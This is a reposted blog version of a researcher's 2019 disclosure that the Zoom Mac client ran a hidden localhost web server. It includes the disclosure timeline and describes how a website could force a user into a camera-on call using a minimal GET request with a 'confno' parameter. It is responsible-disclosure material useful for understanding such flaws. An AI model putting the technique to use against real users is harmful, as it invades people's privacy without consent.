Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

Author: No Comments Share:

A vulnerability in the Mac Zoom Client allows any malicious website to enable your camera without your permission. The flaw potentially exposes up to 750,000 companies around the world that use Zoom to conduct day-to-day business.

Jonathan Leitschuh
  • DOS Vulnerability — Fixed in Client version 4.4.2 — CVE-REQUESTED
  • Information Disclosure (Webcam) — Unpatched — CVE-REQUESTED

This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

Yep, no joke.
  • Mar 8, 2019 — Requested security contact via Twitter (no response).
  • Mar 26, 2019 — Contacted Zoom Inc via email with 90-day public disclosure deadline. Offered a “quick fix” solution.
  • Mar 27, 2019
    – Requested confirmation of reception.
    – Informed that Zoom Security Engineer was Out of Office.
    – Offered and declined a financial bounty for the report due to policy on not being able to publicly disclose even after the vulnerability was patched.
  • Apr 1, 2019 — Requested confirmation of vulnerability.
  • Apr 5, 2019 — Response from Zoom Security Engineer confirming and discussing severity. Settled on CVSSv3 score of 5.2/10.
  • Apr 10, 2019 — Vulnerability disclosed to Chromium security team.
  • Apr 18, 2019 — Updated Zoom with the suggestion from Chromium team.
  • Apr 19, 2019 — Vulnerability disclosed to Mozilla FireFox security team.
  • Apr 26, 2019 — Video call with Mozilla and Zoom Security Teams
    Disclosed details of impending DNS expiration.
  • June 7, 2019 —Email from Zoom about a video call to discuss fix.
  • June 11, 2019 — Video call with Zoom Security team about impending disclosure. Discussed how Zoom’s planned patch was incomplete.
  • June 20, 2019 — Contacted about having another video call with Zoom Security Team. Declined by me due to calendar conflicts.
  • June 21, 2019 — Zoom reports vulnerability was fixed.
  • June 24, 2019 — 90-day public disclosure deadline ends. Vulnerability confirmed fixed with ‘quick fix’ solution.
  • July 7, 2019 — Regression in the fix causes the video camera vulnerability to work again.
  • July 8, 2019
    – Regression fixed.
    – Workaround discovered & disclosed.
    – Public Disclosure.

On Mac, if you have ever installed Zoom, there is a web server on your local machine running on port 19421. You can confirm this server is present by running lsof -i :19421 in your terminal.

Here’s the code on the Zoom site that tipped me off to this localhost server.
Browser console logs when visiting https://zoom.us/j/492468757
The two numbers are the pixel dimensions of the image returned by the web server.

The Video Call Vulnerability

I created a personal meeting with a different account and cracked open Postman and started to remove parameters to see what the minimal GET request was that was required to launch a Zoom meeting.

  • confno=[whatever the conference number is]

The above-described behavior continues to work to this day! You can still use this exploit to launch someone into a call without their permission.

Previous Article

How to run a small social network site for your friends

Next Article

Zoom Zero Day: 4+ Million Webcams & maybe an RCE? Just get them to visit your website!

You may also like

Leave a Reply

Your email address will not be published. Required fields are marked *